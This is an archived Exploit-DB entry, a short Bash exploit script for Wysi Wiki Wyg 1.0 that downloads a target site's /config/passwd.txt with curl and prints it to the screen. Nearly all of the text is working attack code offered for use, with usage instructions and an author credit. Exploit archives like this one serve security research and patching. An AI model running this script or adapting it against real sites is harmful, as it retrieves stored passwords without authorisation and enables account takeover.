exploit-db-mirror/exploits/php/webapps/7434.sh
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

19 lines
No EOL
371 B
Bash
Executable file

#!/bin/bash
# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
# by athos - staker[at]hotmail[dot]it
host=$1;
name=$2;
path='/config/passwd.txt';
if [ "$name" = "" ]; then
echo "Usage: bash $0 [host/path] [filename]";
echo "by athos - staker[at]hotmail[dot]it";
exit;
fi;
curl $host/$path > $name;
clear
cat $name;
# milw0rm.com [2008-12-12]